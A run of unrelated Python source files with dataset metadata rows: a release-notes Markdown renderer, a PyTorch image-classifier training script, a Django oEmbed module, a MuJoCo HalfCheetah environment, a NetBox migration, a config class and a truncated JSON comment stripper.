# licensed under the Apache Software License, v. 2 except as noted otherwise in the LICENSE file
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from abc import abstractmethod
from collections import namedtuple
from pydash import _
from github.release_notes.model import ReleaseNote, REF_TYPE_COMMIT
def get_or_call(obj, path):
value = _.get(obj, path)
if callable(value):
return value()
return value
TitleNode = namedtuple("TitleNode", ["identifiers", "title", "nodes", "matches_rls_note_field_path"])
TARGET_GROUP_USER_ID = 'user'
TARGET_GROUP_USER = TitleNode(
identifiers=[TARGET_GROUP_USER_ID],
title='USER',
nodes=None,
matches_rls_note_field_path='target_group_id'
)
TARGET_GROUP_OPERATOR_ID = 'operator'
TARGET_GROUP_OPERATOR = TitleNode(
identifiers=[TARGET_GROUP_OPERATOR_ID],
title='OPERATOR',
nodes=None,
matches_rls_note_field_path='target_group_id'
)
TARGET_GROUP_DEVELOPER_ID = 'developer'
TARGET_GROUP_DEVELOPER = TitleNode(
identifiers=[TARGET_GROUP_DEVELOPER_ID],
title='DEVELOPER',
nodes=None,
matches_rls_note_field_path='target_group_id'
)
TARGET_GROUP_DEPENDENCY_ID = 'dependency'
TARGET_GROUP_DEPENDENCY = TitleNode(
identifiers=[TARGET_GROUP_DEPENDENCY_ID],
title='DEPENDENCY',
nodes=None,
matches_rls_note_field_path='target_group_id'
)
TARGET_GROUPS = [
TARGET_GROUP_USER,
TARGET_GROUP_OPERATOR,
TARGET_GROUP_DEVELOPER,
TARGET_GROUP_DEPENDENCY
]
CATEGORY_ACTION_ID = 'action'
CATEGORY_BREAKING_ID = 'breaking'
CATEGORY_BREAKING = TitleNode(
identifiers=[CATEGORY_BREAKING_ID, CATEGORY_ACTION_ID],
title='⚠️ Breaking Changes',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORY_NOTEWORTHY_ID = 'noteworthy'
CATEGORY_NOTEWORTHY = TitleNode(
identifiers=[CATEGORY_NOTEWORTHY_ID],
title='📰 Noteworthy',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORY_IMPROVEMENT_ID = 'improvement'
CATEGORY_OTHER_ID = 'other'
CATEGORY_OTHER = TitleNode(
identifiers=[CATEGORY_OTHER_ID, CATEGORY_IMPROVEMENT_ID],
title='🏃 Others',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORY_FEATURE_ID = 'feature'
CATEGORY_FEATURE = TitleNode(
identifiers=[CATEGORY_FEATURE_ID],
title='✨ New Features',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORY_BUGFIX_ID = 'bugfix'
CATEGORY_BUGFIX = TitleNode(
identifiers=[CATEGORY_BUGFIX_ID],
title='🐛 Bug Fixes',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORY_DOC_ID = 'doc'
CATEGORY_DOC = TitleNode(
identifiers=[CATEGORY_DOC_ID],
title='📖 Documentation',
nodes=TARGET_GROUPS,
matches_rls_note_field_path='category_id'
)
CATEGORIES = [
CATEGORY_BREAKING,
CATEGORY_FEATURE,
CATEGORY_BUGFIX,
CATEGORY_DOC,
CATEGORY_OTHER,
CATEGORY_NOTEWORTHY,
]
class Renderer(object):
def __init__(self, release_note_objs: [ReleaseNote]):
self.rls_note_objs = _.uniq(release_note_objs)
def render(self) -> str:
origin_nodes = _\
.chain(self.rls_note_objs)\
.sort_by(lambda rls_note_obj: rls_note_obj.cn_source_repo.github_repo())\
.sort_by(lambda rls_note_obj: rls_note_obj.is_current_repo, reverse=True)\
.uniq_by(lambda rls_note_obj: rls_note_obj.cn_source_repo.name())\
.map(lambda rls_note_obj: TitleNode(
identifiers=[rls_note_obj.cn_source_repo.name()],
title='[{origin_name}]'.format(
origin_name=rls_note_obj.cn_source_repo.github_repo()
),
nodes=CATEGORIES,
matches_rls_note_field_path='cn_source_repo.name' # path points to a function
))\
.value()
release_note_lines = self._to_release_note_lines(
nodes=origin_nodes,
level=1,
rls_note_objs=self.rls_note_objs
)
if not release_note_lines:
return 'no release notes available'
return '\n'.join(release_note_lines)
def _to_release_note_lines(
self,
nodes: [TitleNode],
level: int,
rls_note_objs: [ReleaseNote]
) -> [str]:
lines = list()
for node in nodes:
filtered_rls_note_objects = _.filter(
rls_note_objs,
lambda rls_note_obj:
get_or_call(rls_note_obj, node.matches_rls_note_field_path) in node.identifiers
)
if not filtered_rls_note_objects:
continue
if node.nodes:
release_note_lines = self._to_release_note_lines(
nodes=node.nodes,
level=level + 1,
rls_note_objs=filtered_rls_note_objects
)
lines.append(self._title(node, level))
lines.extend(release_note_lines)
else:
bullet_points = self._to_bullet_points(
tag=node.title,
rls_note_objs=filtered_rls_note_objects
)
# title is used as bullet point tag -> no need for additional title
lines.extend(bullet_points)
return lines
def _header_suffix(
self,
rls_note_obj: ReleaseNote
) -> str:
if not rls_note_obj.user_login and not rls_note_obj.reference.identifier:
return ''
header_suffix_list = list()
if rls_note_obj.reference.identifier:
header_suffix_list.append(self._header_suffix_reference(rls_note_obj))
if rls_note_obj.user_login:
header_suffix_list.append(self._header_suffix_user(rls_note_obj))
header_suffix = ' ({s})'.format(
s=', '.join(header_suffix_list)
)
return header_suffix
def _header_suffix_reference(
self,
rls_note_obj: ReleaseNote
):
reference_id_text = rls_note_obj.reference.identifier
reference_prefix = rls_note_obj.reference.type.prefix
should_generate_link = self._generate_link(rls_note_obj)
is_reference_auto_linked = rls_note_obj.is_current_repo and not should_generate_link
if rls_note_obj.reference.type == REF_TYPE_COMMIT:
if is_reference_auto_linked:
# for the current repo we use gitHub's feature to auto-link to references,
# hence in case of commits we don't need a prefix
reference_prefix = ''
if should_generate_link:
reference_id_text = rls_note_obj.reference.identifier[0:12] # short commit hash
reference = '{reference_prefix}{ref_id}'.format(
reference_prefix=reference_prefix,
ref_id=reference_id_text,
)
if is_reference_auto_linked:
return reference
if not should_generate_link:
# returns e.g. gardener/cc-utils#42 or g. gardener/cc-utils@commit-hash
return '{repo_path}{reference}'.format(
repo_path=rls_note_obj.cn_source_repo.github_repo_path(),
reference=reference
)
return self._github_reference_link(
rls_note_obj=rls_note_obj,
reference=reference
)
def _header_suffix_user(
self,
rls_note_obj: ReleaseNote
):
is_user_auto_linked = not self._generate_link(rls_note_obj)
if is_user_auto_linked:
return '@{u}'.format(
u=rls_note_obj.user_login
)
return self._github_user_profile_link(
user=rls_note_obj.user_login,
github_url=rls_note_obj.cn_source_repo.github_url()
)
def _github_reference_link(
self,
rls_note_obj: ReleaseNote,
reference: str
) -> str:
reference_link = '{source_repo_url}/{github_api_resource_type}/{ref_id}'.format(
source_repo_url=rls_note_obj.cn_source_repo.github_repo_url(),
ref_id=rls_note_obj.reference.identifier,
github_api_resource_type=rls_note_obj.reference.type.github_api_resource_type
)
link_text = '{repo_path}{reference}'.format(
repo_path=rls_note_obj.cn_source_repo.github_repo_path(),
reference=reference
)
return self._build_link(url=reference_link, text=link_text)
def _github_user_profile_link(
self,
user: str,
github_url: str
) -> str:
user_link_text = '@{u}'.format(u=user)
user_url = '{github_url}/{u}'.format(
u=user,
github_url=github_url
)
return self._build_link(url=user_url, text=user_link_text)
def _to_bullet_points(
self,
tag: str,
rls_note_objs: [ReleaseNote],
):
bullet_points = list()
for rls_note_obj in rls_note_objs:
for i, rls_note_line in enumerate(rls_note_obj.text.splitlines()):
# trim '*' or '-' bullet points
rls_note_line = _\
.chain(rls_note_line)\
.trim()\
.reg_exp_replace(r'^\* ', '')\
.reg_exp_replace(r'^- ', '')\
.trim()\
.value()
if not rls_note_line:
continue
if i == 0:
bullet_points.append(
self._build_bullet_point_head(
line=rls_note_line,
tag=tag,
rls_note_obj=rls_note_obj
)
)
else:
bullet_points.append(self._build_sub_bullet_point(rls_note_line))
return bullet_points
def _build_bullet_point_head(
self,
line: str,
tag: str,
rls_note_obj: ReleaseNote
) -> str:
"""returns the headline of a bullet point, usually containing some meta information
e.g. '* foo-message (#pr-number, @foo-user)' """
pass
def _build_sub_bullet_point(self, rls_note_line: str):
"""returns the details of a bullet point, usually as indented bullet point"""
pass
@abstractmethod
def _title(
self,
node: TitleNode,
level: int
) -> str:
pass
@abstractmethod
def _generate_link(self, rls_note_obj: ReleaseNote) -> bool:
pass
@abstractmethod
def _build_link(self, url: str, text) -> str:
pass
class MarkdownRenderer(Renderer):
def __init__(
self,
release_note_objs: [ReleaseNote],
force_link_generation:bool=False
):
super().__init__(release_note_objs)
self.force_link_generation = force_link_generation
def _title(
self,
node: TitleNode,
level: int
) -> str:
return '{hashtags} {title}'.format(hashtags=_.repeat('#', level),title=node.title)
def _generate_link(self, rls_note_obj: ReleaseNote) -> bool:
return self.force_link_generation or not rls_note_obj.from_same_github_instance
def _build_bullet_point_head(
self,
line: str,
tag: str,
rls_note_obj: ReleaseNote
) -> str:
header_suffix = self._header_suffix(rls_note_obj)
return '* *[{tag}]* {rls_note_line}{header_suffix}'.format(
tag=tag,
rls_note_line=line,
header_suffix=header_suffix
)
def _build_sub_bullet_point(self, rls_note_line: str):
return ' * {rls_note_line}'.format(rls_note_line=rls_note_line)
def _build_link(self, url: str, text) -> str:
return '[{text}]({url})'.format(
url=url,
text=text
)
| 32.339378
| 101
| 0.634543
|
6e6233da3bcc159c130ddf635226a58e88be57fc
| 2,406
|
py
|
Python
|
12/train_scratch.py
|
LCL121/start-leanring-pytorch
|
f077ec892b538f3bff5825acce02872d31a1ab5d
|
[
"MIT"
] | null | null | null |
12/train_scratch.py
|
LCL121/start-leanring-pytorch
|
f077ec892b538f3bff5825acce02872d31a1ab5d
|
[
"MIT"
] | null | null | null |
12/train_scratch.py
|
LCL121/start-leanring-pytorch
|
f077ec892b538f3bff5825acce02872d31a1ab5d
|
[
"MIT"
] | null | null | null |
import torch
from torch import optim, nn
import visdom
import torchvision
from torch.utils.data import DataLoader
from pokemon import Pokemon
from resnet import ResNet18
batchsz = 32
lr = 1e-3
epochs = 10
device = torch.device('cuda')
torch.manual_seed(1234)
train_db = Pokemon('../dataset/pokemon', 224, mode='train')
val_db = Pokemon('../dataset/pokemon', 224, mode='val')
test_db = Pokemon('../dataset/pokemon', 224, mode='test')
train_loader = DataLoader(train_db, batch_size=batchsz, shuffle=True, num_workers=4)
val_loader = DataLoader(val_db, batch_size=batchsz, num_workers=2)
test_loader = DataLoader(test_db, batch_size=batchsz, num_workers=2)
viz = visdom.Visdom()
def evalute(model, loader):
correct = 0
total = len(loader.dataset)
for x, y in loader:
x, y = x.to(device), y.to(device)
with torch.no_grad():
logits = model(x)
pred = logits.argmax(dim=1)
correct += torch.eq(pred, y).sum().float().item()
return correct / total
def main():
model = ResNet18(5).to(device)
optimizer = optim.Adam(model.parameters(), lr=lr)
criteon = nn.CrossEntropyLoss()
best_acc, best_epoch = 0, 0
global_step = 0
viz.line([0], [-1], win='loss', opts=dict(title='loss'))
viz.line([0], [-1], win='val_acc', opts=dict(title='val_acc'))
for epoch in range(epochs):
print('start epoch: {}'.format(epoch))
for step, (x, y) in enumerate(train_loader):
# x: [b, 3, 224, 224], y: [b]
x, y = x.to(device), y.to(device)
logits = model(x)
loss = criteon(logits, y)
optimizer.zero_grad()
loss.backward()
optimizer.step()
viz.line([loss.item()], [global_step], win='loss', update='append')
global_step += 1
if epoch % 1 == 0:
val_acc = evalute(model, val_loader)
if val_acc > best_acc:
best_acc = val_acc
best_epoch = epoch
torch.save(model.state_dict(), 'best.mdl')
viz.line([val_acc], [global_step], win='val_acc', update='append')
print('best acc: ', best_acc, 'best epoch: ', best_epoch)
model.load_state_dict(torch.load('best.mdl'))
print('loaded from ckpt!')
test_acc = evalute(model, test_loader)
print('test acc: ', test_acc)
if __name__ == '__main__':
main()
| 27.033708
| 84
| 0.60931
|
b6c38067a23f078f30133d49f2c5fd5f77846bb8
| 7,357
|
py
|
Python
|
oembed/core.py
|
omni-digital/django-oembed
|
9f1bc1b5130dae8a0dd0aaaabb9602b9f8c2ae56
|
[
"BSD-3-Clause"
] | null | null | null |
oembed/core.py
|
omni-digital/django-oembed
|
9f1bc1b5130dae8a0dd0aaaabb9602b9f8c2ae56
|
[
"BSD-3-Clause"
] | null | null | null |
oembed/core.py
|
omni-digital/django-oembed
|
9f1bc1b5130dae8a0dd0aaaabb9602b9f8c2ae56
|
[
"BSD-3-Clause"
] | null | null | null |
import re
import urllib.request, urllib.error
import gzip
from heapq import heappush, heappop
from io import StringIO
try:
import simplejson
except ImportError:
from django.utils import simplejson
from django.conf import settings
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from oembed.models import ProviderRule, StoredOEmbed
from django.template.loader import render_to_string
import logging
logger = logging.getLogger("oembed core")
END_OVERRIDES = (')', ',', '.', '>', ']', ';')
MAX_WIDTH = getattr(settings, "OEMBED_MAX_WIDTH", 320)
MAX_HEIGHT = getattr(settings, "OEMBED_MAX_HEIGHT", 240)
FORMAT = getattr(settings, "OEMBED_FORMAT", "json")
def fetch(url, user_agent="django-oembed/0.1"):
"""
Fetches from a URL, respecting GZip encoding, etc.
"""
request = urllib.request.Request(url)
request.add_header('User-Agent', user_agent)
request.add_header('Accept-Encoding', 'gzip')
opener = urllib.request.build_opener()
f = opener.open(request)
result = f.read()
if f.headers.get('content-encoding', '') == 'gzip':
result = gzip.GzipFile(fileobj=StringIO(result)).read()
f.close()
return result
def re_parts(regex_list, text):
"""
An iterator that returns the entire text, but split by which regex it
matched, or none at all. If it did, the first value of the returned tuple
is the index into the regex list, otherwise -1.
>>> first_re = re.compile('asdf')
>>> second_re = re.compile('an')
>>> list(re_parts([first_re, second_re], 'This is an asdf test.'))
[(-1, 'This is '), (1, 'an'), (-1, ' '), (0, 'asdf'), (-1, ' test.')]
>>> list(re_parts([first_re, second_re], 'asdfasdfasdf'))
[(0, 'asdf'), (0, 'asdf'), (0, 'asdf')]
>>> list(re_parts([], 'This is an asdf test.'))
[(-1, 'This is an asdf test.')]
>>> third_re = re.compile('sdf')
>>> list(re_parts([first_re, second_re, third_re], 'This is an asdf test.'))
[(-1, 'This is '), (1, 'an'), (-1, ' '), (0, 'asdf'), (-1, ' test.')]
"""
def match_compare(x, y):
return x.start() - y.start()
prev_end = 0
iter_dict = dict((r, r.finditer(text)) for r in regex_list)
# a heapq containing matches
matches = []
# bootstrap the search with the first hit for each iterator
for regex, iterator in iter_dict.items():
try:
match = next(iterator)
heappush(matches, (match.start(), match))
except StopIteration:
iter_dict.pop(regex)
# process matches, revisiting each iterator from which a match is used
while matches:
# get the earliest match
start, match = heappop(matches)
end = match.end()
if start > prev_end:
# yield the text from current location to start of match
yield (-1, text[prev_end:start])
# yield the match
yield (regex_list.index(match.re), text[start:end])
# get the next match from the iterator for this match
if match.re in iter_dict:
try:
newmatch = next(iter_dict[match.re])
heappush(matches, (newmatch.start(), newmatch))
except StopIteration:
iter_dict.pop(match.re)
prev_end = end
# yield text from end of last match to end of text
last_bit = text[prev_end:]
if len(last_bit) > 0:
yield (-1, last_bit)
def replace(text, max_width=MAX_WIDTH, max_height=MAX_HEIGHT):
"""
Scans a block of text, replacing anything matched by a ``ProviderRule``
pattern with an OEmbed html snippet, if possible.
Templates should be stored at oembed/{format}.html, so for example:
oembed/video.html
These templates are passed a context variable, ``response``, which is a
dictionary representation of the response.
"""
rules = list(ProviderRule.objects.all())
patterns = [re.compile(r.regex, re.I) for r in rules] # Compiled patterns from the rules
parts = [] # The parts that we will assemble into the final return value.
indices = [] # List of indices of parts that need to be replaced with OEmbed stuff.
indices_rules = [] # List of indices into the rules in order for which index was gotten by.
urls = set() # A set of URLs to try to lookup from the database.
stored = {} # A mapping of URLs to StoredOEmbed objects.
index = 0
# First we pass through the text, populating our data structures.
for i, part in re_parts(patterns, text):
if i == -1:
parts.append(part)
index += 1
else:
to_append = ""
# If the link ends with one of our overrides, build a list
while part[-1] in END_OVERRIDES:
to_append += part[-1]
part = part[:-1]
indices.append(index)
urls.add(part)
indices_rules.append(i)
parts.append(part)
index += 1
if to_append:
parts.append(to_append)
index += 1
# Now we fetch a list of all stored patterns, and put it in a dictionary
# mapping the URL to to the stored model instance.
for stored_embed in StoredOEmbed.objects.filter(match__in=urls, max_width=max_width, max_height = max_height):
stored[stored_embed.match] = stored_embed
# Now we're going to do the actual replacement of URL to embed.
for i, id_to_replace in enumerate(indices):
rule = rules[indices_rules[i]]
part = parts[id_to_replace]
try:
# Try to grab the stored model instance from our dictionary, and
# use the stored HTML fragment as a replacement.
parts[id_to_replace] = stored[part].html
except KeyError:
try:
# Build the URL based on the properties defined in the OEmbed spec.
sep = "?" in rule.endpoint and "&" or "?"
q = urlencode({"url": part,
"maxwidth": max_width,
"maxheight": max_height,
"format": FORMAT})
url = "%s%s%s" % (rule.endpoint, sep, q)
# Fetch the link and parse the JSON.
resp = simplejson.loads(fetch(url))
# Depending on the embed type, grab the associated template and
# pass it the parsed JSON response as context.
replacement = render_to_string('oembed/%s.html' % resp['type'], {'response': resp})
if replacement:
stored_embed = StoredOEmbed.objects.create(
match = part,
max_width = max_width,
max_height = max_height,
html = replacement,
)
stored[stored_embed.match] = stored_embed
parts[id_to_replace] = replacement
else:
raise ValueError
except ValueError:
parts[id_to_replace] = part
except KeyError:
parts[id_to_replace] = part
except urllib.error.HTTPError:
parts[id_to_replace] = part
# Combine the list into one string and return it.
return mark_safe(''.join(parts))
| 40.202186
| 114
| 0.595895
|
e3062b124219c226c8a09040d4ccc3a7260206ff
| 6,142
|
py
|
Python
|
multiworld/envs/mujoco/classic_mujoco/half_cheetah.py
|
corl2019metaworld/metaworld
|
46d54644915a7d80d3f4206e2e5abe1ccbdb5393
|
[
"MIT"
] | 249
|
2018-06-07T19:12:05.000Z
|
2022-03-29T14:40:16.000Z
|
multiworld/envs/mujoco/classic_mujoco/half_cheetah.py
|
corl2019metaworld/metaworld
|
46d54644915a7d80d3f4206e2e5abe1ccbdb5393
|
[
"MIT"
] | 37
|
2018-07-25T07:08:57.000Z
|
2021-03-13T21:13:51.000Z
|
multiworld/envs/mujoco/classic_mujoco/half_cheetah.py
|
corl2019metaworld/metaworld
|
46d54644915a7d80d3f4206e2e5abe1ccbdb5393
|
[
"MIT"
] | 67
|
2018-06-26T21:41:21.000Z
|
2022-01-07T10:16:01.000Z
|
from collections import OrderedDict
import numpy as np
from gym.spaces import Dict, Box
from multiworld.core.multitask_env import MultitaskEnv
from multiworld.core.serializable import Serializable
from multiworld.envs.env_util import get_stat_in_paths, create_stats_ordered_dict, get_asset_full_path
from multiworld.envs.mujoco.mujoco_env import MujocoEnv
class HalfCheetahEnv(MujocoEnv, MultitaskEnv, Serializable):
def __init__(self, action_scale=1, frame_skip=5, reward_type='vel_distance', indicator_threshold=.1, fixed_goal=5, fix_goal=False, max_speed=6):
self.quick_init(locals())
MultitaskEnv.__init__(self)
self.action_scale = action_scale
MujocoEnv.__init__(self, self.model_name, frame_skip=frame_skip)
bounds = self.model.actuator_ctrlrange.copy()
low = bounds[:, 0]
high = bounds[:, 1]
self.action_space = Box(low=low, high=high)
self.reward_type = reward_type
self.indicator_threshold=indicator_threshold
self.fixed_goal = fixed_goal
self.fix_goal = fix_goal
self._state_goal = None
self.goal_space = Box(np.array(-1*max_speed), np.array(max_speed))
obs_size = self._get_env_obs().shape[0]
high = np.inf * np.ones(obs_size)
low = -high
self.obs_space = Box(low, high)
self.achieved_goal_space = Box(self.obs_space.low[8], self.obs_space.high[8])
self.observation_space = Dict([
('observation', self.obs_space),
('desired_goal', self.goal_space),
('achieved_goal', self.achieved_goal_space),
('state_observation', self.obs_space),
('state_desired_goal', self.goal_space),
('state_achieved_goal', self.achieved_goal_space),
])
self.reset()
@property
def model_name(self):
return get_asset_full_path('classic_mujoco/half_cheetah.xml')
def step(self, action):
action = action * self.action_scale
self.do_simulation(action, self.frame_skip)
ob = self._get_obs()
info = self._get_info()
reward = self.compute_reward(action, ob)
done = False
return ob, reward, done, info
def _get_env_obs(self):
return np.concatenate([
self.sim.data.qpos.flat[1:],
self.sim.data.qvel.flat,
])
def _get_obs(self):
state_obs = self._get_env_obs()
achieved_goal = state_obs[8]
return dict(
observation=state_obs,
desired_goal=self._state_goal,
achieved_goal=achieved_goal,
state_observation=state_obs,
state_desired_goal=self._state_goal,
state_achieved_goal=achieved_goal,
)
def _get_info(self, ):
state_obs = self._get_env_obs()
xvel = state_obs[8]
desired_xvel = self._state_goal
xvel_error = np.linalg.norm(xvel - desired_xvel)
info = dict()
info['vel_distance'] = xvel_error
info['vel_difference'] =np.abs(xvel - desired_xvel)
info['vel_success'] = (xvel_error < self.indicator_threshold).astype(float)
return info
def compute_rewards(self, actions, obs):
achieved_goals = obs['achieved_goal']
desired_goals = obs['desired_goal']
distances = np.linalg.norm(achieved_goals - desired_goals, axis=1)
if self.reward_type == 'vel_distance':
r = -distances
elif self.reward_type == 'vel_success':
r = -(distances > self.indicator_threshold).astype(float)
else:
raise NotImplementedError("Invalid/no reward type.")
return r
def reset_model(self):
qpos = self.init_qpos + self.np_random.uniform(low=-.1, high=.1, size=self.model.nq)
qvel = self.init_qvel + self.np_random.randn(self.model.nv) * .1
self.set_state(qpos, qvel)
return self._get_obs()
def viewer_setup(self):
self.viewer.cam.distance = self.model.stat.extent * 0.5
def reset(self):
self.reset_model()
goal = self.sample_goal()
self._state_goal = goal['state_desired_goal']
return self._get_obs()
def get_diagnostics(self, paths, prefix=''):
statistics = OrderedDict()
for stat_name in [
'vel_distance',
'vel_success',
'vel_difference',
]:
stat_name = stat_name
stat = get_stat_in_paths(paths, 'env_infos', stat_name)
statistics.update(create_stats_ordered_dict(
'%s%s' % (prefix, stat_name),
stat,
always_show_all_stats=True,
))
statistics.update(create_stats_ordered_dict(
'Final %s%s' % (prefix, stat_name),
[s[-1] for s in stat],
always_show_all_stats=True,
))
return statistics
"""
Multitask functions
"""
@property
def goal_dim(self) -> int:
return 1
def get_goal(self):
return {
'desired_goal': self._state_goal,
'state_desired_goal': self._state_goal,
}
def sample_goals(self, batch_size):
if self.fix_goal:
goals = np.repeat(
self.fixed_goal.copy()[None],
batch_size,
0
)
else:
goals = np.random.uniform(
self.goal_space.low,
self.goal_space.high,
size=(batch_size, self.goal_space.low.size),
)
return {
'desired_goal': goals,
'state_desired_goal': goals,
}
def set_to_goal(self, goal):
pass
def get_env_state(self):
joint_state = self.sim.get_state()
goal = self._state_goal.copy()
return joint_state, goal
def set_env_state(self, state):
state, goal = state
self.sim.set_state(state)
self.sim.forward()
self._state_goal = goal
if __name__ == "__main__":
env = HalfCheetah()
env.get_goal()
env.step(np.array(1))
env.reset()
| 34.312849
| 148
| 0.605992
|
3fcec7933fa34b0b794921e08104f125a0a50da4
| 5,589
|
py
|
Python
|
netbox/circuits/migrations/0001_initial_squashed_0010_circuit_status.py
|
xcorp/netbox
|
48b9c9da932dc736710d9c14793067093f8f1bde
|
[
"Apache-2.0"
] | 6
|
2017-12-01T05:13:39.000Z
|
2020-01-23T13:04:43.000Z
|
netbox/circuits/migrations/0001_initial_squashed_0010_circuit_status.py
|
xcorp/netbox
|
48b9c9da932dc736710d9c14793067093f8f1bde
|
[
"Apache-2.0"
] | 8
|
2021-04-16T01:38:00.000Z
|
2022-01-04T21:27:27.000Z
|
netbox/circuits/migrations/0001_initial_squashed_0010_circuit_status.py
|
xcorp/netbox
|
48b9c9da932dc736710d9c14793067093f8f1bde
|
[
"Apache-2.0"
] | 3
|
2017-11-18T01:28:22.000Z
|
2018-05-17T14:04:43.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-07-31 02:25
import dcim.fields
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
replaces = [('circuits', '0001_initial'), ('circuits', '0002_auto_20160622_1821'), ('circuits', '0003_provider_32bit_asn_support'), ('circuits', '0004_circuit_add_tenant'), ('circuits', '0005_circuit_add_upstream_speed'), ('circuits', '0006_terminations'), ('circuits', '0007_circuit_add_description'), ('circuits', '0008_circuittermination_interface_protect_on_delete'), ('circuits', '0009_unicode_literals'), ('circuits', '0010_circuit_status')]
dependencies = [
('dcim', '0001_initial'),
('dcim', '0022_color_names_to_rgb'),
('tenancy', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Provider',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('name', models.CharField(max_length=50, unique=True)),
('slug', models.SlugField(unique=True)),
('asn', dcim.fields.ASNField(blank=True, null=True, verbose_name='ASN')),
('account', models.CharField(blank=True, max_length=30, verbose_name='Account number')),
('portal_url', models.URLField(blank=True, verbose_name='Portal')),
('noc_contact', models.TextField(blank=True, verbose_name='NOC contact')),
('admin_contact', models.TextField(blank=True, verbose_name='Admin contact')),
('comments', models.TextField(blank=True)),
],
options={
'ordering': ['name'],
},
),
migrations.CreateModel(
name='CircuitType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50, unique=True)),
('slug', models.SlugField(unique=True)),
],
options={
'ordering': ['name'],
},
),
migrations.CreateModel(
name='Circuit',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('cid', models.CharField(max_length=50, verbose_name='Circuit ID')),
('install_date', models.DateField(blank=True, null=True, verbose_name='Date installed')),
('commit_rate', models.PositiveIntegerField(blank=True, null=True, verbose_name='Commit rate (Kbps)')),
('comments', models.TextField(blank=True)),
('provider', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='circuits', to='circuits.Provider')),
('type', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='circuits', to='circuits.CircuitType')),
('tenant', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='circuits', to='tenancy.Tenant')),
('description', models.CharField(blank=True, max_length=100)),
('status', models.PositiveSmallIntegerField(choices=[[2, 'Planned'], [3, 'Provisioning'], [1, 'Active'], [4, 'Offline'], [0, 'Deprovisioning'], [5, 'Decommissioned']], default=1))
],
options={
'ordering': ['provider', 'cid'],
},
),
migrations.AlterUniqueTogether(
name='circuit',
unique_together=set([('provider', 'cid')]),
),
migrations.CreateModel(
name='CircuitTermination',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('term_side', models.CharField(choices=[('A', 'A'), ('Z', 'Z')], max_length=1, verbose_name='Termination')),
('port_speed', models.PositiveIntegerField(verbose_name='Port speed (Kbps)')),
('upstream_speed', models.PositiveIntegerField(blank=True, help_text='Upstream speed, if different from port speed', null=True, verbose_name='Upstream speed (Kbps)')),
('xconnect_id', models.CharField(blank=True, max_length=50, verbose_name='Cross-connect ID')),
('pp_info', models.CharField(blank=True, max_length=100, verbose_name='Patch panel/port(s)')),
('circuit', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='terminations', to='circuits.Circuit')),
('interface', models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='circuit_termination', to='dcim.Interface')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='circuit_terminations', to='dcim.Site')),
],
options={
'ordering': ['circuit', 'term_side'],
},
),
migrations.AlterUniqueTogether(
name='circuittermination',
unique_together=set([('circuit', 'term_side')]),
),
]
| 58.831579
| 451
| 0.604044
|
7668abd0213c180f9c98071efbc9347d68617826
| 124
|
py
|
Python
|
src/gamenight/app/config/default.py
|
justanr/gamenight
|
968dad4b60179c6a2dbdc5006835eda7dc17640d
|
[
"MIT"
] | 3
|
2018-04-24T07:54:48.000Z
|
2021-05-15T02:55:11.000Z
|
src/gamenight/app/config/default.py
|
justanr/gamenight
|
968dad4b60179c6a2dbdc5006835eda7dc17640d
|
[
"MIT"
] | 11
|
2018-04-25T02:30:00.000Z
|
2018-05-08T01:03:33.000Z
|
src/gamenight/app/config/default.py
|
justanr/gamenight
|
968dad4b60179c6a2dbdc5006835eda7dc17640d
|
[
"MIT"
] | null | null | null |
class DefaultGameNightConfig:
SQLALCHEMY_DATABASE_URI = 'sqlite:///games.db'
SQLALCHEMY_TRACK_MODIFICATIONS = False
| 31
| 50
| 0.790323
|
788755fd74d7526c6b1e2b7a97185ea059167470
| 2,341
|
py
|
Python
|
src/crawler-retriever.py
|
GTG3000/StarboundDescriptionPatcher-Compiler
|
44e9b1621a4372ba185f1ffbdd6687e931f44fda
|
[
"Apache-2.0"
] | 1
|
2016-10-27T04:22:20.000Z
|
2016-10-27T04:22:20.000Z
|
src/crawler-retriever.py
|
GTG3000/StarboundDescriptionPatcher-Compiler
|
44e9b1621a4372ba185f1ffbdd6687e931f44fda
|
[
"Apache-2.0"
] | null | null | null |
src/crawler-retriever.py
|
GTG3000/StarboundDescriptionPatcher-Compiler
|
44e9b1621a4372ba185f1ffbdd6687e931f44fda
|
[
"Apache-2.0"
] | null | null | null |
import os
import json
import re
def removecomments(s):
inCommentSingle = False
inCommentMulti = False
inString = False
t = []
l = len(s)
i = 0
fromIndex = 0
while i < l:
c = s[i]
if not inCommentMulti and not inCommentSingle:
if c == '"':
slashes = 0
for j in range(i - 1, 0, -1):
if s[j] != '\\':
break
slashes += 1
if slashes % 2 == 0:
inString = not inString
elif not inString:
if c == '#':
inCommentSingle = True
t.append(s[fromIndex:i])
elif c == '/' and i + 1 < l:
